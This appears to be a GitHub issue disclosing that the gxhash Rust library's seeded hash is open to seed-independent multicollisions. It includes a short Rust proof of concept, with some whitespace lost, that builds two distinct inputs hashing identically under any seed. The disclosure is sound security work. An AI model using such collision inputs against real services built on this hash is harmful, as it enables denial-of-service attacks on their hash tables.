There are probably other issues as well, but this line is particularly problematic:
gxhash/src/gxhash/platform/x86.rs
Line 86 in 8bee61e
let mut tmp1 = aes_encrypt(v0, v2);
This step is trivial to invert, which allows you to create arbitrary seed-independent multicollisions (the program below constructs two different 192-byte inputs that hash identically under any seed). I would suggest not advertising DoS resistance for this hash at all.
// Not an endorsement of aes_crypto, just the first crate// I could find that allows cross-platform single-round encryption.use aes_crypto::AesBlock;fnmain(){let zero_key =AesBlock::zero();letmut s0 =[0u8;192];letmut s1 =[0u8;192]; s0[64] =100; s1[64] =42;let v0 =AesBlock::new(s0[64..64 +16].try_into().unwrap()); v0.enc(zero_key).store_to(&mut s0[64 +32..]);let v0 =AesBlock::new(s1[64..64 +16].try_into().unwrap()); v0.enc(zero_key).store_to(&mut s1[64 +32..]);// Different strings.assert!(s0 != s1);// Collide regardless of seed.assert!(gxhash::gxhash128(&s0,0) == gxhash::gxhash128(&s1,0));assert!(gxhash::gxhash128(&s0,0xdeadbeef) == gxhash::gxhash128(&s1,0xdeadbeef));}